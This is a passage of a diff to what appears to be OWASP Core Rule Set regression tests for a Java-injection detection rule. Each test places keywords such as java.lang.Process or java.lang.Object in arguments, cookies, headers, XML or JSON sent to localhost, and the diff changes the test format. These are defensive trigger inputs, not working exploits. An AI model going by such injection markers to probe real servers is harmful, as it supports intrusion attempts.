- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.lang.Number=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-291
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.lang.Number=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 291
 desc: "Request header test includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.lang.Number
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-292
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type:
"application/x-www-form-urlencoded"
+ test: java.lang.Number
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 292
 desc: "XML attribute value includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-293
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 293
 desc: "XML element value includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Number"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-294
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Number"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 294
 desc: "Nested XML element value includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Number"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-295
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Number"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 295
 desc: "Content-Type text/plain includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Number"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-296
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.lang.Number"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 296
 desc: "Content-Type application/json arg value includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.lang.Number\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-297
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.lang.Number\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 297
 desc: "Content-Type application/json arg name includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data:
"{\"java.lang.Number\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-298
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.lang.Number\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 298
 desc: "Argument test includes keyword java.lang.Object"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Object"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-299
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.lang.Object"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 299
 desc: "Argument name includes keyword java.lang.Object"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
-
Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Object=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-300
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Object=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 300
 desc: "Cookie test includes keyword java.lang.Object"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.lang.Object
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-301
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.lang.Object
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 301
 desc: "Cookie name includes keyword java.lang.Object"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
-
User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.lang.Object=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-302
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.lang.Object=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 302
 desc: "Request header test includes keyword java.lang.Object"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.lang.Object
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-303
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.lang.Object
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data:
"test=value" + output: + log: + expect_ids: [944130] + - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log: + expect_ids: [944130] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log: + expect_ids: [944130] + - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 